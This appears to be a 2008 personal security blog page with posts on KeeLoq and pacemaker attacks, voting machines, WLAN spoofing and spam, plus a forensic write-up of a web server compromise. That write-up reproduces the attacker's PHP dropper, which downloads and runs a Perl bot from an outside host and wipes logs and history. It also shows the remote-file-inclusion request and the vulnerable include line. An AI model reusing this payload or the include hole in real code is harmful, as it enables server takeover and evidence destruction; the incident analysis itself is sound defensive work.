Master key breaks RFID remote door opener used for cars and buildings

March 31, 2008

Researchers from the university of Bochum found a way to unlock commonly used RFID anti-theft devices and door openers. The product which they successfully attacked is called KeeLoq, which is used by the car manufactures Chrysler, Daewoo, Fiat, General Motors, Honda, Toyota (Lexus), Volvo, Volkswagen and Jaguar. According to Prof. Christof Paar it is possible to sniff the communication from as far as 100 meters.

A little bit more at the technique used for this attack: The sender and receiver encrypt their communication with a proprietary non-linear encryption algorithm, which encrypts the control commands with an onetime code. A 32bit IV and a 32bit hopping code is used in conjunction with a unique code for every remote control. But there is a problem. There also exists a master key for all keys of a given series. This master key was the attack vector used by they guys from the university of Bochum. They did some side canal analyses to gain knowledge of that key, by doing a differential power analyses (DPA) and a differential electro magnetic analyses (DEMA). After you got the master key you need only to intercept 2 messages to calculate the secrete key of the remote control. According to the researchers they did test the system on commercially available devices. You can read more about it here.

Beside gaining unauthorized access it is also possible to manipulate the system in way that the authorized is not able to access the car/building. Even better!

And again, as I’ve written in my posting “A perfect high tech murder”, stop reinventing the wheel and stop trying to be smart! They guys in the IT industry learned it already the hard way – use standard and documented encryption! You’re not smarter than the guys doing this for a living and whom survived the internet! One positive aspect: I don’t have a car from one of the above manufactures. 😉

mailNewRecordings: Script for reporting Dreambox recordings

March 28, 2008

I’ve written a small script which reports the recordings of my Dreambox 500 receiver (with a Gemini image), which writes its data onto my Linux file server, via email. This is important as I’ve configured the Dreambox to record automatically some series. The script can be run on the file server (as in my case) or on the Dreambox (if it has python installed). It is configurable via an ini-file and reports the new recordings including the description text provided by the EPG during the recording. A summary of all stored recordings is added at the bottom of the mail. The mail also includes the amount of space used by the recordings and the available storage space. Call the script via cron once a day. Ah, and here is the link to the script: mailNewRecordings-0.1.tar.bz2

A perfect high tech murder

March 23, 2008

If your victim has a Pacemaker, there is an almost untraceable attack vector according to the study “Pacemakers and Implantable Cardiac Defibrillators: Software Radio Attacks and Zero-Power Defenses” from the universities Washington and Massachusetts.

Some pacemakers have a wireless interface to extract patient data, which the devices records. Ok that’s a information leak but not a possibility to kill someone, but it was also possible to change settings of the device like disabling the device, or the triggering current pulse of the defibrillator. And what doctor will look at the pacemaker if a human with a know heart problem died by a heart attack? Sure currently the attack range is under 30cm, but this is enough. Manufacturers are claiming that this is a theoretical attack, but I think that’s not true. It is not an attack for a common murderer, but for someone who went to the university and studied something like electrical engineering or informatics it is a valid option. You need just a crowd to come close to the victim, like in a bus/train at rush hour, a big sport event or at a party.

This shows again that more and more information technology is silently intruding into our lives without most noticing it. But the people you’re working on it are often not experts in the informatics and therefore make the same mistakes as we did some years ago in the more commonly recognized information technology. The difference is that at that time the IT was not that omnipresent and the backbone of our daily lives. IT security is not only for networks and IT departments!

1+13+40+3+4 = 60 or 61?

March 22, 2008

A normal calculator would know the correct answer but not a Sequoia voting machine, which was used in a New Jersey Election. Take a look at the post “Evidence of New Jersey Election Discrepancies”, which shows a summary tape for the presidential primary election. Now the word is out, what is the reaction of Sequoia? Sure, threat the guy who had the insolence to recalculate the numbers on the summary tape, so he buckles under rather than show how poorly designed Sequoia’s e-voting machines are. But what do we know about bloggers? That this will evoke the Streisand Effect as bloggers around the word will now know about it and will blog about it.

That shows this again, we can’t let something as important as our demography depend on trade secrets. Voting computers are just a bad idea, as every citizen needs to be able to verify the correct enumeration. Sure most won’t do it, but they could and some even will specially in turbulent times, when it specially counts.

Take also a look at this humorous little video (which I found here) concerning how insecure voting machines are.

flash_movie

A tale of searching for a hacker and his supporter, the idiot programmer

March 14, 2008

Some days ago a friend called me, one of his web servers had a spike in the traffic monitoring of the router. Over 2GB in one hour was not normal for this server and he asked me to take a look, which I did and which was the start of a journey. The first command I executed after login was top which reported following:

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
17448 www-data 25 0 48580 33m 5876 R 24 2.4 380:07.76 apache2
3117 www-data 25 0 6232 4392 1424 R 23 0.3 932:05.18 perl
3105 www-data 25 0 6232 4240 1272 S 19 0.3 687:54.80 perl
17447 www-data 25 0 44804 30m 5804 R 13 2.2 357:28.33 apache2

that did not look normal. I asked my friend if he is using perl on the webserver. He told me only for awstats but he uses the version which comes with the distribution and should be therefore up to date. When I did take a look with ps aux I could not find the perl process, the process with the same pid as above had the “name” /usr/sbin/apache2 -k start -DSSL, which was also the output of cat /proc/3117/cmdline. I wanted to know who the parent process was so I did following:

ps axo stat,euid,ruid,tty,tpgid,sess,pgrp,ppid,pid,pcpu,comm

Which showed the correct process name but which also showed that init (pid 1) was the was the parent process which could not be possible: Now that looked really bogus and I did a netstat -anp which showed me following:

tcp 0 0 88.xxx.xxx.xxx:57350 194.109.20.90:6666 ESTABLISHED3105/apache2 -k sta

A telnet 194.109.20.90:6666 showed me that this was a normal IRC server from the undernet.org network. Now I was sure that someone hacked the machine of my friend. I started my search for files which the attacker had created with following command:

touch -d "10 march 2008 20:00:00" date_marker
find / -newer date_marker > long_list.txt

I walked with my friend through the results but there were no files which where created by the attacker, so it seams the attacker knew at least some techniques to hide his traces. The apache logfiles didn’t help either, as I didn’t know when the infections took place and via which of the > 40 vhosts (some used by customers to upload there own stuff), which generated many entries even in the error log. I made also sure that no system files had been changed/replaced and I’m quite sure now that the attacker stayed with within the www-data user. So I did a restart of the server and could confirm that that the system was clean again and that I could look how long it would take for a reinfection. It was now already late in the night, as I got called in the evening, and I started a tcpdump on all non standard ports before I went to bed.

On the next day the system was infected again but now I had only 12h hours to cover. I downloaded the tcpdump raw packets file to my notebook and took a look with it with Wireshark. I went looking for port 6665 to 6669 at first and as I guest that the first connection attempt is also the infection time, I knew now the time. I got the time but I also got more – the complete IRC data the bot uses to connect and wait for his master:

IRC network: undernet.org
Channel: #vx.
Channel password: .BushMaster.

A look into the channel showed that only 30 nicks where present in that channel but that more than one operator was there which where searching for new victims in a systematic way as every 10-20 minutes a new nick joint. But this is an other story for an other post (maybe).

I knew now the infection time and found something in the apache error log, just between the log entries:

[Thu Mar 13 04:14:13 2008] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/xxxxxxxx/robots.txt
[Thu Mar 13 04:18:51 2008] [error] [client xxx.xxx.xxx.xxx] Negotiation: discovered file(s) matching request: xxxxxxxxxxxxx (None could be negotiated).
--04:20:17-- http://www.wolffilm.de/s.txt
=> `s.txt'
Resolving www.wolffilm.de... 217.160.103.90
Connecting to www.wolffilm.de|217.160.103.90|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104,328 (102K) [text/plain]
0K .......... .......... .......... .......... .......... 49% 1.14 MB/s
50K .......... .......... .......... .......... .......... 98% 3.75 MB/s
100K . 100% 21.89 MB/s
04:20:17 (1.78 MB/s) - `s.txt' saved [104328/104328]

I tried at once to download that file, but it was not there anymore. I searched for the file on the web server it was also not there. I started a search for any other wget entries in the apache error log and did find one before – the original infection.

But what now, the systems was setup in a way that I didn’t have all logfiles in one place and they were also not complete and really usable. And with > 40 vhosts it would take ages so I decided to do a full tcpdump of all traffic which goes to and from the server after a restart to monitor the reinfection. I looked with

ps axo stat,euid,ruid,tty,tpgid,sess,pgrp,ppid,pid,pcpu,comm | grep perl

every some hours to check if a reinfection has already happened, if not I restarted tcpdump to reset the raw packet file. After I came back from the monthly LUGT meeting (linux user group tirol) the system was infected again and I got >6gb of tcpdump trace. But now I knew what to look for, the wget entries. I found them at Thu Mar 13 21:34:42 2008. I used tcpslice to extract the time frame which was interesting for me.

tcpslice -w attack.raw 2008y3m13d21h30m +600 dump-02.raw

After downloading the file onto my poor and old notebook I searched in Wireshark for the same time stamp and I found the break in:

GET /pages.php?content=http://www.flying-swan.de/s? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.xxxxxxx.xxxx
User-Agent: libwww-perl/5.805

which generated following action by the webserver:

GET /s?.php HTTP/1.0
Host: www.flying-swan.de

HTTP/1.1 200 OK
Date: Thu, 13 Mar 2008 20:33:12 GMT
Server: Apache/1.3.34 Ben-SSL/1.55
Last-Modified: Thu, 13 Mar 2008 20:30:15 GMT
ETag: "930958-119a-47d98ed7"
Accept-Ranges: bytes
Content-Length: 4506
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

<?
exec("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
popen("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
proc_open("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
shell_exec("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
system("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
passthru("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
popen("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd", "r");
proc_open("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd", "r");
unlink("/tmp/sess_e00dd4lbo2ad2758n9fc641e47cd76x9");
unlink("s.txt");
unlink("s.txt*");
unlink(".bash_history");
?>

which than downloaded the perl script I attached here … It is worthwhile a look. After all this work I was curious how the php script looked which as used for gaining access to the server. Lets take a look at the interesting parts of the page.php file:

<!--Fireworks 8 Dreamweaver 8 target. Created Tue Dec 18 21:07:03 GMT+0100 2007--<
....
<td height="21" colspan="2" bgcolor="#C9CACC">   <a href="./">Home</a> | <a href="pages.php?content=info">Information</a> | <a href="pages.php?content=progr">Programm</a> | <a href="pages.php?content=anmeld">Anmeldung</a> </td>

and finally:

<?php include($_GET[content].".php");?>

Argh .. I’m going to kill this idiot programmer … who is that damn stupid still in 2008? I can’t believe it – how can someone like this call himself programmer. I deactivated the whole website and I told my friend that he should send the programmer an invoice for my hours I needed to trace this down to something like this stupid. Thats want I can call only wantonly negligent and I need also to talk to my friend about the security of his web server, but I believe that this was opened due request by the idiot .. ah sorry … programmer.

Open AIM 2.0 leads hopefully to more security

March 11, 2008

As I pointed out in my post about “ICQ / AOL is testing encryption – by adopting XMPP” the original AOL software may communicate in a secure way but most 3rd party software does not. But these software is the most commonly used one, at least by people I know.

AOL has now released Open AIM 2.0, 2 years after the first step into the direction of openness, the specification of the OSCAR protocol with is used for AIM and ICQ. And it is now also allowed to make money with AIM and even to support multiple protocols in a software (which was not allowed previously – click here for the license). My hope now is that the developers of multi instant network clients will take a look at it and implement also the security features the protocol provides so I can start using ICQ also over insecure WLANs 😉

There is even a competition with some money for innovative usage of the API. The question which arises now, why this move? yes it is a good move, but still why now. Could it be that XMPP is the new rising star? AOL is already supporting XMPP with a test server, which also shows that OSCAR has some functions which XMPP has not (sure also the other way round), but without documentation no 3rd party developer makes use of this extra functionality. Now there is a documentation which may leads to some innovative software pasted on the OSCAR protocol, which would help AOL to protect there investment.

Amazon MP3 with Linux downloader

March 4, 2008

I don’t really know why a special client program is necessary in the first place but still it is time to celebrate a little bit. Amazon has announced the beta version, which still has the full functionality, of a Linux client for their music download portal. The software is provided as binary packages for Ubuntu 7.10, Debian 4.0, Fedora 8 and OpenSUSE 10.3 (Sorry no source available). The music itself is DRM free and provided as high quality MP3 files.

It seems that Linux is now getting more awareness in the desktop field which is good. But I still don’t understand why Amazon does not an AJAX enhanced web site as their competence lies in that area. What I would like to see is an open API for accessing the portal/music so it could be integrated into Amarok or similar open source programs.

The neglected WLAN security problem: Preferred Network List

A commonly neglected attack vector onto computers attached to a WLAN lies in the “Preferred Network List”, which is used to save the SSIDs of successfully connected networks. At a later time the computer connects to this network automatically. This also happens for unencrypted networks like the ones used for public hotspots (e.g: T-Mobile_T-Com). Under Windows and Kubuntu this behavior is activated by default, and Windows even does not store the MAC address of the access point what Kubuntus KNetworksManager does.

How does this help an attacker to attack a notebook which is connected to a WPA protected access point? It is quite easy. The attacker sends a faked deauthentification packet with the identification of the access point. This is easy as the WLAN control packets run unencrypted over the network even with WPA and without cryptographic authentication. The notebook will now try to reconnected again and it will choose the access point with the best reception – in our case the attacker with a tool like Karma sending the SSID of the real access point.

Often you here from so called experts to deactivate broadcasting of the SSID. This is a bad idea as you help an attacker even further, as in this case the notebook send actively probe requests if it doesn’t find an active SSID broadcast. This will tell the SSID of the networks you’re looking for to the attacker. Even Microsoft discourage from deactivating the SSID broadcast.

You want to see the attack live and you’re at the CeBIT? Then got to the Heise-Forum (Hall 5, booth E38) where Sebastian Schreiber from SySS will do a live hacking presentation on Tuesday, Thursday and Saturday at 13:00

spammers start using one-way IP addresses

It seams that botnet operators are finding a way to bypass real time blacklists, which lists IP addresses that did send spam in the past – which therefore are likely to still send spam. The Institute for Internet Security of the German University of Applied Sciences Gelsenkirchen did take a 24 hour sample with 17 million requests to the blacklist provided by iX. The analysis shows that one third of the queried IP addresses where only requested one time (about 459.000 of 1.351.000).

As the day, which was used for this sample, was a Saturday where a 95% spam ratio is normal, it is realistic to assume that most of this IP addresses were used for sending spam. This leads to the conclusion that a real time blacklist which lists IP addresses only for a short period can only reach a 66 percent hit rate. More is only possible with blacklists that block complete ranges permanently, like dynamic IP ranges lists.

Powered by WordPress
Entries and comments feeds. Valid XHTML and CSS. 28 queries. 0.101 seconds.